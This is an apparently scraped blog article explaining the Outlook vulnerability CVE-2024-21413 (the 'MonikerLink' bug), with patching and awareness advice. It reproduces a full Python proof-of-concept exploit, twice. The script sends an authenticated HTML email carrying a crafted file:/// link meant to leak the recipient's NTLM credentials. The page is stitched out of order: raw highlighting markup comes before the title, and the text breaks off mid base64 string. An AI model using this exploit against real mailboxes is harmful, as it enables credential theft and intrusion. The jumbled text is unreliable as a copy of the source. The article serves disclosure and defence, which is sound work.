Free AI web copilot to create summaries, insights and extended knowledge, download it at here

7349

Abstract

span class="hljs-keyword">def</span> <span class="hljs-title function_">send_email</span>(<span class="hljs-params">smtp_server, port, username, password, sender_email, recipient_email, link_url, subject</span>):

<span class="hljs-string">"""Sends an email with both plain text and HTML parts, including advanced features."""</span>
msg = MIMEMultipart(<span class="hljs-string">'alternative'</span>)
msg[<span class="hljs-string">'Subject'</span>] = subject
msg[<span class="hljs-string">'From'</span>] = sender_email
msg[<span class="hljs-string">'To'</span>] = recipient_email

text = <span class="hljs-string">"Please read this email in HTML format."</span>
base64_image_string = <span class="hljs-string">"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANgAAAAuCAYAAABK69fpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6QTAwQkM2Mzk4NDBBMTFFNjhDQkVCOTdDMjE1NkM3RkQiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6QTAwQkM2Mzg4NDBBMTFFNjhDQkVCOTdDMjE1NkM3RkQiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDpBMkM5MzFBNDcwQTExMUU2QUVERkExNDU3ODU1M0I3QiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDpBMkM5MzFBNTcwQTExMUU2QUVERkExNDU3ODU1M0I3QiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgQJy/MAAAxESURBVHja7FwNlFVVFT6PN8MMM8AIjPxomEyggCYgajIaguCkaC5AEocif9CIiLLyp9IMC9NgVRqrGpMSwcFSIs3URHERJoJCSlIgMQk0YCS/MjAww8zrbO/36rz99rnvzpt3Z6Z551trL5hz3z3n3HPO/t/3Rg6NL6lXIeCWXhfk0r99Ji05Hkb/IxojI8vK6lfbrk+fPl05OLQ2OrglcHBwDObg4BjMwcHBMZiDg2MwBwfHYA4ODr7IaW8PNOfliNryeKnqpM50u+vQXJRoGqlpmKZiTUc0HdT0hKa1Wclg+9/urWqqe6pOPf8vpjtYU39Nb4Mc2g6+oukWTSdZLL/sZLDDu4tU/ZE82+VZmko1NQgL9oymymYMPUTT7ZoaWXtU0wuafmm00QS/p+kLmvIhGedpmu3OdauDCiR+gLNiw7GsNRE75DSqSIeY7fJYTVdarp2u6TeajqY5NDFXueXaUcZgozV91fi7QNNdml7U9Cd3xlsVs1IwV1xAZieDpYCf5DlD0wWaVqTRbz9Nl/hcr2N/jxJ+E8H4jsFaD700fVFo365pIfwvcu7/xq53hWV0tqalmrZkK4OlkkrXpMlgE+EEB8V6S/tf3Ta0KiiYcSpre1fT5WxvOkAgfkLTJAjG09D+sslgLkyfiAlNZJQ4Y05t4j2/1/QQa7tf0x/cFrQqBoFxTDwpCD7ysztqukfTNE0DwUs13L93GiwRPTRN0fTjJtxThgBHU1CraYamRzSdrOmfmtZoirktaFU0Cm1vNMH0z3ofLAhI5T+ogkeKbhA2KYhlQJLuFbfcbZ7B6n32L2ZpdwwG7NB0GKZBHOdqGqqC5TnINLiIta1IEfDgdnwcMcsGSyhSXn6mGHtI972vaZem3QHHihkHpLumPvh/NZx5G05AMID+LcAB3K/pPU3/TmMPOmk6BX1SSuM4xv9XE/ujQENvzKsQ/dC89qCvVPvQgPE5cvFvlK1frkWQJvw+2xmMwucLNX3faKO81OSADEZBkW7G3xs1PRuAwegw/QSMorDBFJn6cgozcQhMy3OUV2XQjUnarZr+oulhTc8bG/5d3BMzJPUEHJA7NV2K/mJ4bko37GVjj0H7UAQCehjXDoExyZz6tabfBVg7YuqZCBQMZP1RXnAb5vINi9CI43xN12oarrxorulD12BemzUtUV4FBmfue5UXGazHGnDcrLwgVg5jsCjmzfv7oaZ9uB7Jdgaj518OM+90ZibehQ2yoQAba4LyaDsDjFuIyFS+0XYiGC1mOYxzNF3P7uGScxCIDtpKmLnERBTlupD9/sOafqqSUwbn4qDEQZryATBk1DJ2F2PscgQGvqbpHcvvidkpL/hRn7UdDJpvYbBiY006WvrpDCYgGg/rgnJcm4z9vwhCw4b4PIIgivVLUI/ZDNqYKhwIE30htfxwhUoM6RIzPi5EoWy2PmfeI5bfUtHXUmiu/IDPFROCKnys+5Scj6s17ieN+RIETjTg2BEw43ImtOIgbbHMh7lMHLOYzb2wJtN9mEvCGGj2YQHWPSPIdgaL4OBUCs7sZJ9DRe3Xsbb1MPMKMqxhf6a8yg8J+2CWvpXCjJI0xJU+QqcePs3DFiZR0E5kjm63XKcaywWGGRxftzkQYDwa9xLM6xWGeZonCCxqe0TwfePYjnnZtGdfCMJijFsYtomU7cjHAaV6wXFG+2iYBm8J9wwTDv2CEOY2zaJJKaw/D1piHzQOOffnKa9ANa8JwvN5+Ey1eN5SaI3bmKSP42n4GVW4pwD+z23wh0xcCC0zF3+XwFzlUbcvwWSsh6lbAu06Q2CwuN/GQRHZu5VXNH0EZu5H4GOOEZifinnvgKDsargGvEyK5v6MRRA9wMzHWqz/xv8yWPzrT2Hh3aVT0mbiiopFTb6nIT0tpiCtxzGHdaKFwa5h5to2I6iQKXTHAeDYAH9iG2vfgyAHMcDFKlhObTYOJT84A5Rcj0fpi88L7Tvg8y0TzM6bNP1c0wFNH1LJify16NcM1sTfLljErIhuYEaOF2Bx7BcE0ToEOD7Jrt2AQNObzN/iIG24yrJ+fDyKXK42+2x3JmLj3/Ue5qb1pbiVKvmVkc+o5MLOIjCYid8qL0ydSVwmmFLkt00VmEuxiN5TKnXRMh2a7wjtdZD4XVn7VkT0lM9hmyH4NKQtzjKEGWf8bsJYpkYwfdUyBGdMvAdm2W/powbz4vvTG9qam5+ShSMhT3AhItxFyFkwcn5DGAf9xlWzPhi8YuKSurQ7Wb7EfklFRknfRbxiQLWav+vEdEbbA0b5utHWDwf9Saa9TmaOeGUIS3ip0PaQRaOmgwU+Wk7ybxb6HOI4NkNQjWPtI8DQVNf3PvPLKPL4nPKitqnqQKWgDEVuq1PctxN7eBNrH4tgiQtyhGgimlikEstfSEhcbawTmU9T2D2vKnvxbrrIRbTNBDFDpmoV4/kuG3h+h3yyNQH7flVoiyfyqyzjlsLPIQYrhz8pYbBFEwfB60LbSWGfR1fsm4hNsOdNXG6YauT0f0xgykzjBJWYRI5r2OoM9d/oo41Iu3QRzMaDAfuWoopRo59vKa96RjK5Loa/RO/FfVYwvwqF5wgaPd0ltJ3iGKzlsUAl5l66woEmXMvs9G0qnAp4qWzqqErOZ4Wx95SczWnGWWmwPE8crykvT+b3ag5FJSkUP9dgziLBV2tUwcvLpJRLgWOwlgdJT/5C3VXKSypfleQKen5FphFRyeHpQhVyzgY4LvhmERW80r9TgN+QlUBpjtnKi/TZcKv6X9TwkEXzRZrxrNWOwVoeNYLjS5EwKisqZlL5FyHNoVbQBN1bwqRRXoHtQcF8C/qe3AChTSq2pagepQjoTfLPKS+cLoG+W9IT68EjlDkq+QVJG/oHNGcdg7UAHmXmGPlDl7H1WgVzJywmlzZ/Ugs8OwmOrUJ7WcDzJEU/1/ncQ5qJoqOUGpgnmHyUdD4N/98s3H9JwOcaK7S9FsLaxRyDpcY/lPfWsZ8ZsjjkOSwX2iiCWdoCwvNpoW1qAA1KTHiWwECvBJgThe+pGmSt8BwFhvnOQcUA56eY1wiBwSi9sroZa9QgCIMc7us5BrNLokofB3q7Cv/1/idUckEwmWqPQZsqi9P+aQRq8poxNvlIe1hbDwQeSnwO8YOCMHrU8FM/DvN7UAofkO9F3PeiMP47wprQ8w6z9EftVKWTKwiwjc30VQ8I/ucYznEO9kNGSd0hlms7Qx6ftCh9n+/brJ20yLNgNPrAShWk5lAwHh3iDSp4dE3CNuWVN32TtY/S9EeM/QYCFKdCg0xRyamFvczsy0OgiOZJCWIq8H0Tfh8l9amciadBdhhMRb+jOsj57DdngPkoxL8G8+8L5qJwfy/Bx71HNTttKqYIbgZf0ToNdAxmxxFosSGCRF3cQnOgV0rOVMnRS0I5qA5aI5cdoOaCXkQ8TzCtqJ7wVmONCnxMqFlM4zQamnYqiAIqlILoYumL8oxmDqsCQuRq9jti7pkgv3nR/t2hAn6ZNwWoOuR61kY5zDuxRnnORPTHYyo5okYSsqW+XUgH7zrllXDZ0FEwfzKR36mB9PcrYi7w8aemYf1MSLmoImgYqS8yw+cKphnVHv4qjXkdg4b5UYb25zkfRs1rlz5YLBbxS9h0FqSN3xqQGchfVahMYX5Jvk+h4LjzcqCuPgf9U8p7vSLI9+spqLBSJZZ8dREOepC9J9+JXiy9PeDYtfCxRsJf49inguUNyfSi98bGK/mt8sMwSamIN8i3JOuxJlSV4/fFsPyA+2n2e6NKrMhX7doH65jToKIRK4vRtykWMjNwb4pgB6n7pwyzJ1VBKkn8yaytSjhAk9jm7VX2ZC6Nez80Ah1ees+K6vK64x7SdFvge1HEbh07BMQgvdlz7Q+4pMehRYhhRiOYQS9h9oSgOYbno0O2WvnXLK5HH2fD9Ka3mvsY/WyEb0f+y6YAgagKBIOoxGo4668OPuKfsSarA/ily4Qgyusp7qE5U2piAnzUAUZgZkMkWnmg7VbT+8BWTd/wYgc1c/FYFcvv197N14hhcjWlZChTyDEOekMb6Ces/tId/4M9aXcmYjQaU+XnbM4G/zAG7XK8FZhLGWM3tJF+wuov3fEb26UPRss6vP9u5eDQFtD+GEzLjc6d69zOOjgGCw21bmMdHIM5ODgGc3BwcAzm4NAm8R8BBgAGrc+T79nGEQAAAABJRU5ErkJggg=="</span>

html = <span class="hljs-string">f"""\
&lt;html&gt;
&lt;body&gt;
    &lt;img src="<span class="hljs-subst">{base64_image_string}</span>" alt="Image"&gt;&lt;br /&gt;
    &lt;h1&gt;&lt;a href="file:///<span class="hljs-subst">{link_url}</span>!poc"&gt;CVE-2024-21413 PoC.&lt;/a&gt;&lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;
"""</span>

part1 = MIMEText(text, <span class="hljs-string">'plain'</span>)
part2 = MIMEText(html, <span class="hljs-string">'html'</span>)
msg.attach(part1)
msg.attach(part2)

<span class="hljs-keyword">try</span>:
    <span class="hljs-keyword">with</span> smtplib.SMTP(smtp_server, port) <span class="hljs-keyword">as</span> server:
        server.ehlo()
        server.starttls()
        server.ehlo()
        server.login(username, password)
        server.sendmail(sender_email, recipient_email, msg.as_string())
        <span class="hljs-built_in">print</span>(<span class="hljs-string">f"<span class="hljs-subst">{GREEN}</span>✅ Email sent successfully.<span class="hljs-subst">{ENDC}</span>"</span>)
<span class="hljs-keyword">except</span> Exception <span

Options

class="hljs-keyword">as</span> e: <span class="hljs-built_in">print</span>(<span class="hljs-string">f"<span class="hljs-subst">{RED}</span>❌ Failed to send email: <span class="hljs-subst">{e}</span><span class="hljs-subst">{ENDC}</span>"</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>(): display_banner() parser = argparse.ArgumentParser(description=<span class="hljs-string">"PoC for CVE-2024-21413 with SMTP authentication."</span>) parser.add_argument(<span class="hljs-string">'--server'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"SMTP server hostname or IP"</span>) parser.add_argument(<span class="hljs-string">'--port'</span>, <span class="hljs-built_in">type</span>=<span class="hljs-built_in">int</span>, default=<span class="hljs-number">587</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"SMTP server port"</span>) parser.add_argument(<span class="hljs-string">'--username'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"SMTP server username for authentication"</span>) parser.add_argument(<span class="hljs-string">'--password'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"SMTP server password for authentication"</span>) parser.add_argument(<span class="hljs-string">'--sender'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"Sender email address"</span>) parser.add_argument(<span class="hljs-string">'--recipient'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"Recipient email address"</span>) parser.add_argument(<span class="hljs-string">'--url'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"Malicious path to include in the email"</span>) parser.add_argument(<span class="hljs-string">'--subject'</span>, required=<span class="hljs-literal">True</span>, <span class="hljs-built_in">help</span>=<span class="hljs-string">"Email subject"</span>)

args = parser.parse_args()

send_email(args.server, args.port, args.username, args.password, args.sender, args.recipient, args.url, args.subject)

<span class="hljs-keyword">if</span> name == <span class="hljs-string">"main"</span>: <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(sys.argv) == <span class="hljs-number">1</span>: display_banner() sys.exit(<span class="hljs-number">1</span>) main()</pre></div><blockquote id="75cc"><p><b><i>Why SMTP Authentication Matters</i></b></p></blockquote><p id="4904">The use of SMTP authentication in this exploit is pivotal, as it mirrors the tactics employed by sophisticated cyber attackers to navigate around established email security protocols.</p><p id="03f5">By authenticating the email, attackers can give the appearance of legitimacy, increasing the likelihood of their malicious email being received and acted upon by the target.</p><p id="7942">This approach underscores the vulnerability’s criticality and the need for comprehensive security measures beyond standard email validation checks.</p><h2 id="3fa7">Protecting Against CVE-2024–21413</h2><p id="4c8f">In response to the disclosure of CVE-2024–21413, Microsoft has released patches to mitigate the vulnerability.</p><p id="762e">Users and IT administrators are urged to apply these updates promptly to protect against potential exploits. The following measures are also recommended to enhance security:</p><ul><li><b>Update Regularly</b>: Ensure that your Microsoft Office suite is up-to-date with the latest security patches.</li><li><b>Educate Users</b>: Raise awareness among users about the risks of phishing emails and the importance of caution when dealing with unexpected emails.</li><li><b>Implement Advanced Security Solutions</b>: Utilize email security solutions that offer advanced threat protection capabilities, including scanning of email attachments and links for malicious content.</li></ul><h2 id="6589">Conclusion</h2><p id="8336">CVE-2024–21413 is a stark reminder of the importance of cybersecurity vigilance. As cyber threats continue to evolve, staying informed and prepared is key to protecting sensitive information and systems.</p><p id="d5bf">By understanding the nature of such vulnerabilities and taking proactive steps to mitigate them, individuals and organizations can significantly reduce their risk of falling victim to cyberattacks.</p><p id="cefb">Don’t forget to clap 👏 and follow for more updates on cybersecurity trends and insights!</p><p id="80a7">For further reading on CVE-2024–21413 and detailed technical guidance, visit Microsoft’s official advisory and cybersecurity platforms that offer real-time updates on vulnerabilities and threats.</p><p id="34de">Follow me on Medium (it helps :D) with:</p><div id="79cd" class="link-block"> <a href="https://medium.com/@elniak/subscribe"> <div> <div> <h2>Stay tuned to my publishes! :D (ElNiak)</h2> <div><h3>Stay tuned to my publishes! :D (ElNiak) 🔐💪 Unlock the Power of Knowledge with ElNiak on Medium! Dive into the dynamic…</h3></div> <div><p>medium.com</p></div> </div> <div> <div style="background-image: url(https://miro.readmedium.com/v2/resize:fit:320/0*jc5q6EHHrVDcqgg6)"></div> </div> </div> </a> </div><p id="781a">My <a href="https://twitter.com/CyberElNiak">Twitter</a> to follow</p><p id="7dbe">My <a href="https://www.linkedin.com/in/christophe-crochet-5318a8182/">LinkedIn</a></p><p id="a74d">My GitHub account to follow:</p><div id="863b" class="link-block"> <a href="https://github.com/ElNiak"> <div> <div> <h2>ElNiak - Overview</h2> <div><h3>I'm a cybersecurity researcher and teaching assistant at UCLouvain. - ElNiak</h3></div> <div><p>github.com</p></div> </div> <div> <div style="background-image: url(https://miro.readmedium.com/v2/resize:fit:320/0*0iOT-yXdBXCoRx1U)"></div> </div> </div> </a> </div><h1 id="f42f">References:</h1><ul><li><b>Microsoft Security Response Center</b>: For official advisories, patch information, and detailed descriptions of CVE-2024–21413. https://portal.msrc.microsoft.com/en-US/security-guidance</li><li><b>GitHub PoC Repository</b>: Contains the proof of concept script and detailed explanation for CVE-2024–21413 exploitation. https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability</li><li><b>Checkpoint Research</b>: Offers an in-depth analysis of the #MonikerLink bug, exploring its implications and the broader cybersecurity landscape. https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/</li></ul></article></body>

The Unseen 0-Click Threat Lurking in Your Inbox: CVE-2024–21413 Explained

Dive deep into CVE-2024–21413, a critical vulnerability in Microsoft Outlook that allows remote code execution, its implications, and how to protect your systems.

Free article

In the ever-evolving landscape of cybersecurity, a new critical vulnerability has emerged, targeting the ubiquitous email client that many of us rely on daily: Microsoft Outlook.

Dubbed CVE-2024–21413, this vulnerability has raised alarms across the cybersecurity community due to its potential to allow attackers to execute arbitrary code remotely, without requiring any user interaction.

This article aims to shed light on CVE-2024–21413, exploring its impact, the mechanics behind the vulnerability, and the steps users and organizations can take to protect themselves.

What is CVE-2024–21413?

CVE-2024–21413 is a remote code execution vulnerability found in Microsoft Office Outlook.

Classified as critical, this vulnerability can compromise the confidentiality, integrity, and availability of the affected system.

It exploits the Outlook Preview Pane as an attack vector, enabling malicious code execution in editing mode instead of the restricted Protected View.

The Severity of the Threat

With a Common Vulnerability Scoring System (CVSS) score of 9.8, CVE-2024–21413 is among the most severe threats disclosed in recent times.

Its criticality stems from the ability to execute code remotely without any user interaction, bypassing traditional security measures like Office Protected View.

This level of vulnerability opens the door for attackers to carry out sophisticated cyberattacks, ranging from data theft to deploying ransomware across an organization’s network.

How Does It Work?

CVE-2024–21413 leverages the Outlook Preview Pane as a gateway for attacks. Typically, Microsoft Office employs Protected View as a sandboxing technique to prevent potentially harmful documents from executing code without user consent.

However, this vulnerability circumvents these protections, allowing malicious code to run as soon as the email is previewed.

This breach can occur without clicking or opening the email, making it particularly insidious and difficult to detect before it’s too late.

Exploiting CVE-2024–21413: The #MonikerLink Bug Unveiled

CVE-2024–21413, termed the #MonikerLink bug, represents a severe security flaw within Microsoft Outlook.

Its discovery underscores a significant risk, including potential local NTLM information leakage and remote code execution capabilities.

This vulnerability uniquely stands out as it can circumvent the security measures of Office Protected View, posing a broader threat spectrum across various Office applications.

The Technical Breakdown

The exploitation of CVE-2024–21413 involves a sophisticated attack vector that manipulates the email preview feature of Outlook to execute malicious code without user interaction.

The #MonikerLink bug showcases an attacker’s ability to bypass stringent email validation protocols such as SPF, DKIM, and DMARC, employing SMTP authentication to deliver a payload directly to the victim’s inbox, thus evading traditional email security measures.

Proof of Concept (PoC) Demonstration

A detailed Proof of Concept (PoC) (by Alexander Hagenah) outlines the steps for exploiting CVE-2024–21413, utilizing SMTP authentication to send an email that bypasses common security checks.

The PoC script requires parameters like SMTP server details, sender and recipient email addresses, and the malicious URL.

This demonstration provides a real-world scenario of how attackers could leverage this vulnerability to execute remote code on a victim’s system without raising any alarms.

Initial Sending: The email is sent using the specified SMTP server, targeting the recipient with a crafted message containing the malicious link.

Display in Outlook: Upon receipt, the email displays in the Outlook Preview Pane without any warnings or restrictions, demonstrating the bypass of Protected View.

Capturing Credentials: The attack’s effectiveness is further illustrated through a Wireshark capture, showing the interception of NTLM credentials, a critical security breach that could lead to further network compromise.

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import argparse
import sys
# from: https://raw.githubusercontent.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/main/CVE-2024-21413.py

BLUE = "\033[94m"
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"

def display_banner():
    banner = f"""
{BLUE}CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]{ENDC}
"""
    print(banner)

def send_email(smtp_server, port, username, password, sender_email, recipient_email, link_url, subject):

    """Sends an email with both plain text and HTML parts, including advanced features."""
    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender_email
    msg['To'] = recipient_email

    text = "Please read this email in HTML format."
    base64_image_string = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANgAAAAuCAYAAABK69fpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyhpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6QTAwQkM2Mzk4NDBBMTFFNjhDQkVCOTdDMjE1NkM3RkQiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6QTAwQkM2Mzg4NDBBMTFFNjhDQkVCOTdDMjE1NkM3RkQiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDpBMkM5MzFBNDcwQTExMUU2QUVERkExNDU3ODU1M0I3QiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDpBMkM5MzFBNTcwQTExMUU2QUVERkExNDU3ODU1M0I3QiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgQJy/MAAAxESURBVHja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